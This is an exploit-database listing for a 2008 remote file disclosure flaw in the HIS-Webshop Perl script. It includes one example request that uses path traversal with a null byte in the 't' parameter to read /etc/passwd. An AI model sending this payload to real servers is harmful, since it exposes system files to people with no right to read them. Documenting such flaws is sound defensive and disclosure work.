[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability

Author
Zero X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2775
Category
web applications
Date add
24-03-2008
Platform
cgi
===================================================================
HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability
===================================================================



HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn?t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>



#  0day.today [2024-11-15]  #